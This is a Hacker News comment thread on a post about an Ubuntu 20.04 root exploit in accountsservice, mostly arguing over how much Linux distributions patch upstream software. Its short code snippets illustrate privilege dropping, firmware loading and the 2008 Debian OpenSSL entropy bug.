How to get root on Ubuntu 20.04 by pretending nobody’s /home (securitylab.github.com)
876 points by generalizations on Nov 10, 2020 | 278 comments



> It turns out that Ubuntu uses a modified version of accountsservice that includes some extra code that doesn’t exist in the upstream version maintained by freedesktop.

I guess next time people ask why I prefer a distro like Arch, which doesn't insert its own junk into upstream code, over Debian/Ubuntu/et al., I'll have a new example handy to cite.


As mentioned elsewhere, the worse bug was in upstream, unpatched gdm.

It's been a very long time since I worked on a distro (former Canonical employee here) but every distro carries patches of some sort.


I think there's a bit of a distinction between patches that add functionality not accepted by upstream (as here) vs the more typical distro patches which do things like replace bundled libs with shared ones, fix locations for things like TLS bundles, that sort of thing. These can still break things, but much less frequently.

I haven't been a distro packager in many years, but my recollection is that in other distros (debian, fedora, arch, etc) patches that add new functionality would generally not be considered okay unless accepted by upstream. I'd be interested to learn the rationale for not upstreaming this patch before including it.


Arch's policy is to minimize patches. I think the Linux kernel ships with about 2-3 patches per release on average, and most other packages don't carry many more either. In my experience, a "minimal patches & close-to-default" policy is usually a great way to avoid package maintainer issues.


We don't have any policy. Sticking with upstream is a shared value between the packagers, but it's important to note that we generally don't enforce any policy. Most packages have no patches; when there is anything, it's usually regression or security fixes.

Current linux release has one patch changing one default: https://github.com/archlinux/linux/commits/v5.9.8-arch1


The wording on this page suggests that it is a policy:

https://wiki.archlinux.org/index.php/DeveloperWiki:Patching

As you say, the page notes that "[the] policy is intended to suggest, not to enforce", but having a policy is orthogonal to enforcing it.


And as a packager for Arch for the past 3 years: I had no clue this page existed. Evidently we are bad at these policy things. But I'd rather call them social norms than packaging policies.


Even unspoken or badly specified policies can be policies. Just unwritten ones in that case. I thoroughly enjoy this one.


Or why are other packages patched? Is it because it takes too long for upstream to accept the changes?

But why is the kernel patched by distros at all? I always run the kernel from kernel.org and don't see any issues.


On Arch, patches are usually done either to customize the build version (the kernel is 5.9.xy-arch1, for example; that's the only patch) or to make packages build with the newer compiler and libs present on the system, plus any patches necessary to make them work at all, though in my experience those are rare.


Yup. Even Arch.


What about Slackware? It's been a couple of decades, but I used to get my kernel source directly from upstream and never had problems.


With respect to upstream patching, Slackware is similar to Arch: it has a few patches but generally tries to stick to upstream. The kernel is unpatched, though.


For the record, the patch (0010-set-language.patch) is not present in the accountsservice package in Debian, neither in unstable (0.6.55-3), testing (0.6.55-3), nor stable (0.6.54.2).

https://sources.debian.org/src/accountsservice/0.6.55-3/debi...

https://sources.debian.org/src/accountsservice/0.6.45-2/debi...

The changes that fix both vulnerabilities can be viewed here: https://git.launchpad.net/ubuntu/+source/accountsservice/com...

Personally I question the logic of having accounts-daemon grovel through pam_env's config files in the first place. This isn't an API, it's an implementation detail! It just seems like a bad idea, even ignoring the vulnerability, which anyone who isn't an absolute expert on the semantics of real/effective/saved UIDs and how to safely change them could have introduced.

https://www.usenix.org/conference/11th-usenix-security-sympo... (the famous Sendmail vulnerability therein is actually the _opposite_ of the accountsservice problem... sendmail _should_ have set the real uid as well as the effective uid, so that its effective uid could never be changed back to 0).

LWN has an excellent series of articles about the design of UNIX, one of which explains the problems with setuid: https://lwn.net/Articles/416494/
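As a concrete illustration of why the real/effective/saved distinction matters, here is a minimal sketch (assuming Linux/glibc; the UID 1000 and the function name are invented for the example, this is not the accountsservice or sendmail code) of dropping privileges permanently with setresuid(). Because the saved UID is changed too, the process can never regain effective UID 0 later, which is the property the classic sendmail bug lacked.

    /* Hypothetical sketch: dropping privileges for good before touching
     * user-controlled files. Setting only the effective UID (seteuid)
     * would leave the saved UID at 0, so the process could later switch
     * back to root; setresuid() changes real, effective and saved UIDs
     * at once. */
    #define _GNU_SOURCE
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    static void drop_privileges_permanently(uid_t uid)
    {
        if (setresuid(uid, uid, uid) != 0) {
            perror("setresuid");
            exit(EXIT_FAILURE);
        }
        /* Verify the drop really happened before parsing anything the
         * user controls. */
        uid_t r, e, s;
        if (getresuid(&r, &e, &s) != 0 || r != uid || e != uid || s != uid) {
            fprintf(stderr, "failed to drop privileges\n");
            exit(EXIT_FAILURE);
        }
    }

    int main(void)
    {
        drop_privileges_permanently(1000); /* example unprivileged UID */
        /* ... now it is safe(r) to read files like ~/.pam_environment ... */
        return 0;
    }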


I don’t think it makes sense to put Debian and Ubuntu in the same group here


After the Debian SSH key bug I'd say it makes all the sense in the world.


That was twelve years ago.

Do you think equally-bad bugs haven’t made it into upstream projects directly? Hell, many downstream patches exist to fix security bugs.


> That was twelve years ago.

It was a predictable result of Debian policy, which Debian did not see fit to change. Debian still patches upstream sources including security-critical software, still does not have any dedicated security review of those patches, still leaves it up to individual maintainers to decide whether and how to clear these things with upstream, and still thinks all of this is fine.

> Do you think equally-bad bugs haven’t made it into upstream projects directly?

Honestly, I can't think of a single equally-bad bug in "normal" code, only in medical devices / industrial controllers / etc.. Cloudbleed wasn't this bad. Bumblebee deleting /usr wasn't this bad. It really was a uniquely awful bug.


> It was a predictable result of Debian policy, which Debian did not see fit to change. Debian still patches upstream sources including security-critical software, still does not have any dedicated security review of those patches, still leaves it up to individual maintainers to decide whether and how to clear these things with upstream, and still thinks all of this is fine.

It's not fine, but when the upstream authors do not regard or consider requirements of downstream projects, what can you do? Like with the example of phone-home features?

Arch and other distros are only possible because, for a long time, Debian and other distros kept nagging upstream authors about missing features or "non-features". If Debian didn't exist, I bet Arch would have to patch much more itself.


> It's not fine, but when the upstream authors do not regard or consider requirements of downstream projects, what can you do?

Well, as one of those upstream authors whose code was patched: I was never contacted about it, so I never knew there was a requirement to be met, and so they carried around a bad patch for years, about which I knew nothing. Once a user pointed this out to me, the next release fixed the underlying issue in a better way. After years in which the Debian folks didn't file an issue or report the problem in any way that I could tell.

Mind you, Debian is not alone in this, it happens with other distros, too.

And to be fair, I think this rather depends a lot on the downstream package maintainer; I've witnessed this with other projects where they were quite good in interacting with upstream to get something sorted out. I am not really sure if any policy Debian/Fedora/... could enact would really help with it; people can (accidentally or intentionally) ignore them.


> Well, as one of those upstream authors whose code was patched: I was never contacted about it, so I never knew there was a requirement to be met, and so they carried around a bad patch for years, about which I knew nothing. Once a user pointed this out to me, the next release fixed the underlying issue in a better way. After years in which the Debian folks didn't file an issue or report the problem in any way that I could tell.

The maintainer made an error there. Did you open a bug report saying that you fixed it, so the patch is no longer necessary?

> And to be fair, I think this rather depends a lot on the downstream package maintainer; I've witnessed this with other projects where they were quite good in interacting with upstream to get something sorted out. I am not really sure if any policy Debian/Fedora/... could enact would really help with it; people can (accidentally or intentionally) ignore them.

Yeah, and that's the point. People in this thread (not you, as far as I see) say they do not trust Debian because of this, but what about other distributors and packagers? Do they have technical or organizational fences for avoiding such mishaps? If not, then other distributions are as problematic as Debian, even Arch.

Debian did a whole lotta good for Free Software, and I'm really starting to dislike how people shit on the project (again, not you).


> but what about other distributors and packagers? Do they have technical or organizational fences for avoiding such mishaps?

Many distributions have a dedicated security team that has to sign off any patches to security-critical software. Debian's position is that they do not have the resources for such a team, which is fair enough, but IMO the conclusion should be that they don't have the resources to be applying their own patches to security-critical software.

More subjectively I get the sense that Debian packagers patch more aggressively and generally think the Debian way of things is better. This isn't completely groundless: there's a lot of very high quality engineering in Debian, and for a long time their package management was head and shoulders above others, especially if we're talking about C programs/libraries where upstream dependency management is very weak. But it's also made for a culture where packagers think they know better than upstream maintainers, and an approach that ends up conflicting quite a bit with newer languages where there is high-quality dependency management in the upstream builds.


> Many distributions have a dedicated security team that has to sign off any patches to security-critical software

This is false. Debian has a security team and it's way more active than most distributions.

> But it's also made for a culture where packagers think they know better than upstream maintainers

Yes and for good reasons.


> Many distributions have a dedicated security team

Which are some of those distros? (I'd consider using one myself in the future.)


> Well, as one of those upstream authors whose code was patched: I was never contacted about it, so I never knew there was a requirement to be met, and so they carried around a bad patch for years, about which I knew nothing.

In my experience it's rather uncommon for a DD not to contact upstream. Would you mind sharing the package name and vulnerability so I and others can learn what happened?


If we're still talking about the Debian SSH key bug in 2008, here is the Debian bug (from 2006) that led to the security issue, which was discovered in 2008: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=363516.

Upstream was contacted about it: https://marc.info/?t=114651088900003&r=1&w=2


You seem to be _almost_ implying that the package maintainer had some sort of obligation to notify you that your software was being shipped with Debian? And also that you didn't know about it for years?

On the flip side of the coin, there are plenty of open source authors who release their work into the wild and refuse to support or even engage with downstream packagers because they see any other distribution or use of their work as Not Their Problem. And they're not really wrong, building a supportive community around a useful project is totally optional after all.

Between the constant stream of version bumps, security updates, patching, bug triaging, and user support, distribution maintenance seems to be the most thankless job in the open source world.


I agree that patching upstream sources is sometimes necessary. I think Debian is overly aggressive about it (hypocritically so in places: they will patch upstream to comply with the FHS, but won't change their own packaging to comply with the LSB). More to the point, I think patching security-critical packages needs to be treated as a special case and subject to appropriate review (as many other distributions do).


I also haven't used Debian since. No, we are not naive as to the presence of security related bugs elsewhere (e.g. Heartbleed). Just a lot of reputation was lost.

It was interesting because the cause was a patch crafted to satisfy a static analysis tool they insisted on applying to every package, which demonstrated their desire to go above and beyond with respect to quality. Kudos to Debian in that regard. But a blindly applied policy, and bad judgement in disabling some cryptographic initialization code, caused a terrible bug.

I wonder if this is less of an issue today because of well defined kernel interfaces for getting "good" random numbers (i.e. cryptographically suitable). I'm sure the devil is in the details, and OpenSSH's support for unpopular systems means intentional use of uninitialized variables is still in the code base. It's all very impressive to an outsider who knows enough not to tell cryptographers how to do their job.


Which Linux distro do you prefer?


Good question without an easy answer. I was a long-term Gentoo user but recently dumped it for NixOS. Colleagues were pushing it and so far I'm happy. Much less compiling and manual configuration which is what was driving me crazy about Gentoo. It took rather little effort to get the system in a state that feels very comfortable. But my needs have changed over time too, so this isn't strictly my opinion on what is best.

More than a decade ago a programmer friend got Ubuntu running on a second hand desktop for a rather computer illiterate arts & letters student. He was able to navigate the GUI like any other system, and it had Firefox, OpenOffice, and mplayer. I knew then that Linux is a perfectly fine desktop OS. And now we're back to using Debian of a sort. ;-)


> I also haven't used Debian since.

I stopped using Debian when its ridiculous, purely ideological approach to "free" software actually caused me issues.

I needed to install Debian on a relatively old laptop a few years ago. It had all "mainstream" hardware. Its WiFi adapter was an Intel one (and a very common/popular one at the time), but it was one that wasn't open source.

How did Debian approach this? Its installer gave me a not-very-subtle passive-aggressive message telling me that although they have the drivers for the device, it was not going to install them... because the ISO did not include them. With no working WiFi, it of course could not connect to the internet to download them! Worse still, it turns out that even if it had connected to the internet, it wouldn't have downloaded and installed them anyway. I found this out because I managed to use an Ethernet connection.

Completely stupid and frustrating and it felt like I was being blamed as if it was my fault.

Installed Ubuntu, included the drivers, connected to WiFi during the installation.

I have not used Debian on anything since.


The problem is that they aren't very clear about what you might be missing with the standard Debian image you get when you click the big "Getting Debian" link at the top of their homepage. I imagine that many people such as yourself were put off by the fact that they downloaded Debian and thought it was crippled out of the box.

They do provide "nonfree" install media which include firmware blobs that many people need to get their wifi up - https://cdimage.debian.org/cdimage/unofficial/non-free/cd-in.... But it's not easy to get there (I google "Debian nonfree") and it has "unofficial" in the URL which I imagine doesn't help things either.

I understand that Ubuntu is meant to be the user-friendly Debian-based distro and that Debian is meant to be Free Software first and foremost. I just wish that this nonfree install image was a bit more official and easier for users to discover.

edit: oops, I should refresh before hitting "reply"; I didn't see the other answer.


Kind of off-topic, but do you know why they call drivers "firmware"? I thought "firmware" was the code loaded internally in the hardware, and "driver" was the software in the OS that interacted with it (to "drive" it to do what it needs)? This confused me for a long time—I used to think "I've already updated all the firmware on all of my laptop's components, so I don't need extra bundled firmware" at some point, until I realized that's not what they talked about at all. Any idea why they call their drivers "firmware"? I feel like I might not be the only person who's been misled by this in the past.


I think your original understanding is correct - what we're calling "drivers" are run by the host OS and CPU to interact with a peripheral over PCI, USB, SPI, OWI, whatever. And "firmware" is some special software required by the device itself to run (could be some ARM or MIPS binary or whatever arch is used by the CPU(s) on the device). I guess that some peripherals have firmware on non-volatile storage while others require it to be provided by the host when they're initialized.

So the "firmware" I required for my Thinkpad's wifi to work (and which was included in that Debian nonfree image) is this: https://wiki.debian.org/iwlwifi

update: actually on that Debian wiki there's a page called "Firmware" which explains things well https://wiki.debian.org/Firmware
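To make the split concrete, here is a rough, hypothetical sketch (the function, device, and firmware file name "example-wifi-8000.ucode" are all invented; this is not any real driver) of how host-side driver code typically fetches a firmware blob with the kernel's request_firmware() API. The kernel looks for the named file under /lib/firmware, which is exactly the kind of file those non-free packages ship.

    /* Illustrative kernel-module-style sketch only. */
    #include <linux/module.h>
    #include <linux/firmware.h>
    #include <linux/device.h>

    static int example_wifi_load_firmware(struct device *dev)
    {
        const struct firmware *fw;
        int err;

        /* The kernel searches /lib/firmware for this blob -- the driver
         * (host-side code) needs it but does not contain it itself. */
        err = request_firmware(&fw, "example-wifi-8000.ucode", dev);
        if (err)
            return err;

        /* The driver would now upload fw->data (fw->size bytes) to the
         * device, whose own processor executes it. */
        /* example_wifi_upload(dev, fw->data, fw->size); */

        release_firmware(fw);
        return 0;
    }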


Oh interesting, I didn't realize that. Thanks!


You might already know this, but there are Debian versions that address this situation: https://cdimage.debian.org/images/unofficial/non-free/images...

I like that they try to focus on a completely free version, as that is what they stand for and why a lot of people respect them, while at the same time being realistic about the real-world problems that people face.


It is funny though. Debian builds a great product with an unpopular/impractical ideology (not a judgement). Ubuntu comes along, adds a little on top, throws out the ideological constraint, and achieves great market success!

And Debian is great. We might take it for granted now, but 2 decades ago, while everyone else was fiddling with their own package dependencies with RPM (pre-Yum), Debian had amazing package management with builds for all sorts of amazing architectures. They were leaders both in thought and execution.

I tried (but failed) to influence an employer to invest more in Debian; instead they went with SuSE, which eventually caused a few small problems. Now Debian & Ubuntu are booming.


Somehow it doesn't surprise me that I've upset the neckbeards.


People who run Arch want this to happen.

It validates their hobby-like approach to their OS.


> People who run Arch want this to happen.

I've used Arch for the last six+ months and I don't want this to happen.

I switched as I couldn't get VFIO to work with Debian (presumably due to outdated kernel/qemu/libs). In my time with Arch I have had no problems. It has just worked and stayed out of my way. My experience with Debian is that it mostly works, but often uses much older software than one wants. Arch, in my limited experience, is an excellent distribution.


That is the "curse" of Linux I always had difficulty to understand: something does not work at all or the way I like it - switch the god-damn OS (= distro) where it works instead biting the bullet and trying to fix it. It's insane...

This is only a personal observation, not a direct remark about your case. I've just seen similar scenarios too many times.

On the other hand - I've played with Arch since its early beginnings, but the last time was more than 10 years ago. Although it is minimal, simple and straightforward, I have never been able to grok that rolling-release core philosophy.


Could you elaborate on what you mean?


In my job we have 100+ people who run Linux as their main OS.

Most run Ubuntu or Debian, and a few run Arch. And every few weeks someone mentions again how something broke and they need to spend some time fixing it. I think the last one was VMware not yet working on a new kernel.

Arch requires more time to maintain, and more manual maintenance. So in order to justify that extra spent time a lot of times they will bring up minor stuff that happens in Debian/Ubuntu, like this bug from 12 years ago, in order to justify running Arch, which is more of a "learn Linux" hobby.


I was bitten by the rolling-release approach many times on Arch Linux ARM. The last straw was when they decided to move the configuration directory for OpenVPN, which meant it just failed to start up, meaning I could not SSH into it. I had to retrieve it to debug it, costing me hours of my life I would rather have spent on something else.

I learned my lesson. From now on it is boring LTS distros only, and guix for things in userland where I want up to date things.


In my experience, the "learn Linux" part of using Arch is the installing/setup process. Over the past three years, I have had things break perhaps three times. All of them were either my own fault (outdated package) or warned about through Arch News (which I didn't bother to check because it is only necessary a couple of times a year).

That being said, running Arch on a computer that you need to be working at all times might not be a good idea for professional reasons. However, I think you are essentially making a similar argument for Arch as they are making about the Debian bug.


> Arch requires more time to maintain, and more manual maintenance. So in order to justify that extra spent time a lot of times they will bring up minor stuff that happens in Debian/Ubuntu, like this bug from 12 years ago, in order to justify running Arch, which is more of a "learn Linux" hobby.

This is the feeling I get, and it's why I never bothered with Arch, or Gentoo before that. I started on Slackware, and while it was a great learning experience, I feel that's not a lesson I need to repeat.

Same reason for my move from RedHat (after an RPM dependency breakage) to Debian: Debian just works. It GTFO of my way and lets me focus on my code and my projects. Yes, there have been issues; no, Debian isn't "perfect"; but like my preferred MUA, "it sucks less than all the alternatives."


For others wondering what this was referring to: http://taint.org/2008/05/13/153959a.html

TL;DR: To silence a valgrind warning, Debian maintainers added a local patch to OpenSSL that commented out the code seeding the entropy pool, making all SSL keys predictable.


More specifically, they made a valid change that silenced a valid warning, and then in a terrible mistake they found a line somewhere else that looked the same and made the same change to it too.
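For readers who don't remember the details, the shape of that mistake was roughly the following. This is a deliberately simplified, self-contained sketch with invented names, not the actual OpenSSL md_rand.c code.

    /* Toy sketch of the 2008 pattern: two similar-looking calls with very
     * different jobs. All names here are invented for illustration. */
    #include <stddef.h>
    #include <string.h>

    static unsigned char pool[64];   /* stand-in for the PRNG state */

    static void mix_into_pool(const void *buf, size_t n)
    {
        for (size_t i = 0; i < n; i++)   /* toy mixer; the real code hashed */
            pool[i % sizeof pool] ^= ((const unsigned char *)buf)[i];
    }

    /* Called with genuinely random input (e.g. bytes read from /dev/urandom). */
    void pool_add_entropy(const void *buf, size_t n)
    {
        mix_into_pool(buf, n);   /* (1) the call that actually seeds the generator */
    }

    /* Called to fill the caller's buffer with pseudo-random output. */
    void pool_get_bytes(void *buf, size_t n)
    {
        mix_into_pool(buf, n);   /* (2) opportunistically mixes in whatever is in the
                                    caller's (possibly uninitialized) buffer -- the
                                    call valgrind flagged; removing only this one
                                    would have been harmless */
        memcpy(buf, pool, n < sizeof pool ? n : sizeof pool);   /* toy output */
    }

With both calls patched out, about the only varying input left to the generator was the process ID, which is why the space of generated keys collapsed to a small, enumerable set.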


A lot of the Debian patches are also things like removing phone-home, expiration timers, remote code exec via autoupdate, and other upstream nonsense that shouldn’t be in packages in the first place.


Debian still likes to Debianize things too much sometimes.

Gentoo has a much better track record of keeping packages vanilla, in part because patches are kept by default in the single Portage monorepo, so there is incentive not to dump huge patchsets in there. Only a few packages have significant Gentooisms maintained out of there (like the gentoo-sources kernel patchset, which as far as kernel patchsets go is still very light, and you can opt not to use it).

In 15+ years of using Gentoo I only recall two times their patches broke something for me. One, some obsolete crud in gentoo-sources broke booting without an initramfs on HP CCISS RAID controllers (because that's the only(!) block device driver that puts its kernel device names in a subdirectory). Two, a KDE Plasma patch to pull the right system Python version from the Gentoo infrastructure that manages that forked off a subprocess, but got fork() backwards, causing the "main" process PID to change and subtly breaking D-Bus policykit stuff due to security checks on the PID (aka: you can't mount devices from the system tray when the PulseAudio volume widget was loaded, how's that for a fun one to debug).

I don't recall Gentoo ever introducing a security issue, other than perhaps typical packaging mistakes (nothing comes to mind but I assume bad permissions have happened at some point, there's always some of those).

Not a bad track record for being my main workstation OS for a decade and a half.


Yeah, IME, Debian is about the least invasive distro. Their patches tend to be a) minimal and b) only make things better.



Oof. I'd forgotten about that one. Tend to make things better, tend to. It just points out how careful you must be when you're doing systems-level software development.

Also, don't just blindly "fix things" because a tool complains. Understanding warnings and error messages is important.


They fixed a valgrind warning by blindly removing the affected function calls? Might as well reduce every program to an empty main() to enforce correctness.



This comment sums up my thoughts on that issue:

> Using uninitialized data as entropy source is an AMAZING idea in first place. “Fixing” or “unfixing” doesn’t make it any better.


Uuh, no. Perhaps it was initialized with zeros before, or with highly structured data. Uninitialized data is not the same as external noise. I am rather glad they think about that; it was a shame that they overlooked this.


I disagree; what they do to Apache, nginx and especially Exim is very invasive and doesn't bring any actual benefit. They even had to write a program to modify the Exim configuration after they made it impossible to do it by hand.


Regarding Apache and nginx, you're referring to the sites/mods-enabled mechanism? Actually I really like that one compared to the "stock" way of one damn yuge httpd.conf - way more maintainable, no matter if in a Docker container creation script or in a bare-metal environment with Puppet provisioning.

Regarding exim... exim is a nightmare no matter how one looks at it. I hate it with a passion, no matter the distro.


Doesn't Debian sometimes go so far as to split software apart into multiple packages?

I've always thought that Fedora and Arch were both much more "upstream first" than Debian is.


Yep, I had a bug very recently caused by the split between libllvm-dev and libclang-dev... guess what: libllvm-dev's CMake files depend on the clang libs, as they are all built together, so if you only install libllvm-dev, find_package(clang) in CMake will error out without any way to fix it from your code.


/me raises hand

Yes, they do. And then they complain to you that this broke something: they split our package; from the main package A they split off parts into separate packages B, C, ... that depend on A. And then they complained to us that B and C had a circular dependency and that this meant we had to fix something. The audacity.

Our users still sometimes report issues where I immediately ask "are you using Debian or Ubuntu?" and the answer is usually yes: because guess what, they only install A (which matches our software's name) and then they miss the functionality which Debian moved into B, C, ... We actually print a warning about this when starting the software (along the lines of "Warning, B is missing, some things may not work as expected"), which then Debian patched out, calling it "misleading".

I've never had similar issues with any other downstream Linux distro.

So, no, I really can't agree with GP's statement.


> We actually print a warning about this when starting the software (along the lines of "Warning, B is missing, some things may not work as expected"), which then Debian patched out, calling it "misleading".

Wow, this Debian hack really makes life difficult for end users :(


> Doesn't Debian sometimes go so far as to split software apart into multiple packages?

IMHO, this is the correct thing to do.

I've spent a considerable amount of time as both developer and systems administrator. Not quite DevOps, but I've been doing both since before that was a term.

Programmers don't often have that systems level view that is necessary for systems administration. It leads to myopia like this Ubuntu patch, and packaging is usually an afterthought to many programmers. It's that difference between a "project" and a "product."

So honestly, complaining that Debian splits things would be like complaining they don't deliver tarballs, because back before GitHub, that was how upstream "delivered" "packages" (how many people remember "tar -xzf package.tar.gz && cd package && ./configure && make"?). And before you bring up "missing files", you can do an "apt-file" to search for things and then install the associated package, assuming that it wasn't installed already as a Recommended package or in many, many cases, you are using a metapackage which contains the "full" package anyway.


Yes but see the other responses for examples of this "going wrong".

In any case, good or bad, it's invasive.


Yeah, that's a good thing, because I do not always need dev files or documentation or debug symbols on my machine.

People are always on about "slim systems" and Alpine, but when Debian does real engineering, everybody complains it's complicated. That is a little bit annoying.

Yes, Debian is complex, but it's complex for a reason, since there are many requirements.


Also, removing -dev packages and compilers is one of the usual hardening steps, to make it harder for an attacker to establish a foothold and build tools.


No, that's not what I mean. Most distributions do things like splitting out dev files, debug symbols, and documentation.

What I mean is taking one piece of software and splitting it apart into many libraries or binaries in a way that the upstream developer did not originally intend.

See some of the other responses.


What? Are you maybe talking about the extent of downstream patching? Because Arch Linux does insert its own "junk" into upstream, but probably to a lesser extent than Ubuntu or maybe Debian.



Just to be clear, because it's non-obvious: Arch Linux has a single patch (not stored in a .patch file, however), and all things considered it's very simple.

    sed -i '/dbus_conf_dir/s/sysconfdir/datadir/g' meson.build
This is likely needed for the package to build to begin with.


I'm not sure what this is supposed to demonstrate. I literally said that Arch Linux probably applies downstream patches to a lesser degree than Ubuntu. My point was that the person I responded to made it sound as if Arch Linux doesn't do any patching, which is obviously false since they have dozens if not hundreds of packages with downstream patches.


What you call "junk" in Debian are security and stability fixes.


Generally I like the patches, they tend to be sane and not get in the way. Except for the random things it does to GRUB…


If only upstream projects weren't sometimes so stubborn about accepting pull requests or requirements, because downstream projects might have valid requirements.

Then that would not be needed.


Yeah I hate it when distros do this.

Does Debian actually change upstream significantly? I thought they kept things fairly vanilla.

I know Fedora patched in VAAPI support on Firefox before it was merged into the Mozilla codebase. I can't think of a worse piece of software to patch; the last thing I want to be running untested code in is my web browser.


Regarding Fedora's Firefox: The Fedora Firefox maintainers, Martin Stransky and Jan Horak, are also the main maintainers of the Linux/GTK parts of Firefox. The VAAPI patches you've mentioned are (afair) mostly-if-not-all Martin's work. So he's not applying some rando's "untested" patches.


But the patches weren’t in Firefox’s codebase, so they didn’t go through the typical Firefox QA process including the Nightly, Beta, etc process.

I’m not saying those guys don’t know what they’re doing, obviously they are experts. But I would prefer to trust but verify (not just trust).


Most of the Debian changes I've seen consist of changing default paths to match Debian's standards, backporting security changes (esp if a version bump changes functionality), and supporting 'conf.d' directories so packages can drop in configuration files and remove them easily.


> "backporting security changes (esp if a version bump changes functionality"

Thats not a trivial matter, its a potential source of many issues


It's also a source of many solutions.

There is really no perfect option here. Upstream and distro developers have different goals, and it's up to you to decide what you should adopt.


Opinion: the 'perfect solution' is to keep up with upstream and avoid backporting. It takes more work, but it reduces the separation between distro and upstream.


That's definitely not ideal for users, though.

Forced updates every 6 months is annoying to most people. Forced updates every day or so would be annoying to basically everyone.


I've been running Fedora since I-don't-even-remember-when (around 2008?) and I was never annoyed (unless I try to run CUDA and the like, because they rely on e.g. an ancient GCC etc.).

In particular, it was a significant improvement over the annoyances of Ubuntu, and I am still angry when thinking about the brief period I was maintaining a bunch of servers running Debian. Really unnecessarily difficult - particularly updating/upgrading and trying to clear the mess their systemd approach caused, in particular missing unit files for popular services (I think it was the isc-dhcp-server).


But this means that you are happy to upgrade your entire system every six months or whatever Fedora's cadence is. Most people are definitely not happy to do so, because updates mean changes to stuff that works, and most people hate it when stuff that already works changes beneath them.

This is of course even worse if you are not the end-user but are trying to ship an appliance to your customers. Why would you want to update the entire appliance OS in the field for all of your customers just to ship a security patch, instead of sticking with the same base OS on already released appliances?


Hm, let's dissect.

Upgrade schedule for Fedora is twice a year, yes. Goes by without any issues, stuff still works.

There is change and then there is change. Yes, I understand that some things don't need to change, and why do they always have to. Do I need my Desktop to still resemble 3.11 because "Why did it ever change"? - No.

Some things in life simply change and they always have. I try to keep up where change is necessary.

And if I would be shipping appliances to customers, why should I have "forced updates" of any kind outside of my control? I would never sell anything without my own repos, quality control, etc.

Do you seriously sell Debian devices to anyone and support them if anything outside of your control breaks? I seriously don't understand the argument.

And if I ship software of any kind that relies on some libraries, I have to maintain it, of course. This includes going with the major releases.

If this is embedded hardware, where there simply are only two or three updates in its lifetime, everything is different of course, but how on earth would I then have forced updates from RedHat??


My company actually sells CentOS and Ubuntu based appliances (B2B) and we provide customers with updates (which they can choose to install or not) whenever a security problem is found. But we do NOT upgrade major versions in the field - we try to release our latest and greatest with the latest LTS release, and then provide any updates to that LTS. After the OS support period expires, we work with customers to migrate to the newer version of our entire system, instead of trying to provide further security patches.


Sounds perfectly reasonable.

Why are you afraid of updates then?


> Forced updates every 6 months is annoying to most people.

You aren't forced to update on Fedora. Fedora always supports current release n and n-1. There's even a window when n-2 is still supported after a new n is released.

Even then you aren't forced to update. I work with a guy still running Fedora 29. I wouldn't recommend that personally but his machine still works fine and is rock solid stable. Probably not the most secure though :-P


Your "perfect solution" just shifts responsibility for package maintenance (keeping up with changes) to the end user. Many people use Debian exactly because they don't want to deal with every upstream brainfart.


Eh, upstream is not always the best either. Sometimes they don't fix security issues. Sometimes upstream is very change happy and the distribution will do best by lagging behind "and see what happens".


It takes less work. Just run Debian unstable. That's exactly what it is.


Yes, but the alternative is unpatched security issues. Non-trivial but important.


No, the alternative can also be to live with functionality changes.


New functionality means new bugs and breaking changes to old functionality. Sometimes the trade-off is worth it, but I don't like being forced to update when it isn't.


It's the whole point of having a distribution.

If I wanted an endless stream of new vulnerabilities I can just use upstream software.


Note that "bugfixes" are most of the time considered as a functionality change.


> Does Debian actually change upstream significantly? I thought they kept things fairly vanilla.

IME, they do keep things fairly vanilla, and I speak as someone who has run Debian since . . . I wanna say 2002? Plus I've done kernel dev work, and Debian's kernel patches ain't nothing compared to what RedHat used to do.


I maintain a custom/forked driver[1] and support both Fedora/RHEL/CentOS and Ubuntu, and while Ubuntu has gotten much better, in years past I actually had to manage Ubuntu specific branches because they were so hacked up with custom patches from Canonical. I would spend more time fixing Ubuntu weirdness than I would all other distros combined. It's gotten much better the past several releases though, so thank you to Canonical for that :-)

The various RPM flavors keep their kernels vanilla enough that I can mostly just rebase on top of linux-stable, and it's been that way since I started 7 years ago (according to github).

Arch is the winner. I've never had to make a custom patch for Arch.

Disclaimer: I work for Red Hat but opinions are my own

[1]: https://github.com/FreedomBen/rtl8188ce-linux-driver


Fair enough, but I don't put Ubuntu in the same class as Debian, because while they may share many base packages in common, I do seem to remember them patching the kernel more than Debian, and usually stuff that would break my kernel dev too. Hence another reason I'm not on Ubuntu.


Agreed. On a related but different note it does seem like Debian gets (unfairly) painted with light generated by Ubuntu. I run Debian on some machines and most of the issues I have with Ubuntu are not problems on Debian (such as: Snap obsession and forcing, Abandoned/system-wrecking PPAs that are hard to recover from, etc)


> Does Debian actually change upstream significantly? I thought they kept things fairly vanilla.

No, they radically change things to match their standards. E.g. look at their tomcat package which explodes it all over the filesystem.


What is a distribution if not a collection of software that obey the same standard?

Without the latter, all you have is a burlap sack full of software. Hardly a distribution. Fine if that's what you want, but it's not what Debian is.


A distribution is by definition distributing something that already exists, so I think distributions that stick close to upstream are more in the spirit of the concept. I also think Debian's approach has shown itself to produce something less reliable on the whole. Of course if you prefer the Debian approach, knock yourself out.


For those of you that don't like that terminology: let's just use the words that Debian itself uses, namely "the universal operating system". What is an operating system if not a collection of software that follow a standard so as to interoperate?

> I also think Debian's approach has shown itself to produce something less reliable on the whole

I think the opposite. Is there something particular you'd like to point to? I accept the SSH disaster. But that's 12 years ago now, and it is a single example.


> Is there something particular you'd like to point to? I accept the SSH disaster. But that's 12 years ago now, and it is a single example.

Debian's patches to cdrecord introduced so many bugs that they eventually ended up driving the original author away from open source.

I think I remember something about the python 2 -> 3 transition being harder on Debian because of changes they've made?

The packaged Tomcat on Debian is so different that every time I've seen someone running Tomcat they've installed it manually instead.

Debian has essentially given up on packaging Hadoop. Some of their criticisms of its build process are certainly valid, but others seem to be an unreasonable expectation that everything will build exactly the way Debian expects. E.g. if I'm understanding correctly, they essentially take the position that they won't package anything built with Maven, on frankly spurious grounds.

Debian tends to end up with very outdated versions of anything from an ecosystem that uses large numbers of small libraries, or, basically, anything that isn't written in C or Perl. E.g. Python libraries are typically a long way out of date (even compared to other distributions), and Debian's package management tends to be less compatible with Python's built-in tools like pip than other distributions (e.g. Debian is more likely to rename a Python library, in my experience, which then breaks reverse-dependencies on that library or leads to having two incompatible copies of it installed). So people running Python programs on Debian tend to end up with either a difficult-to-manage mix of system and non-system dependencies, or multiple parallel installs of Python.

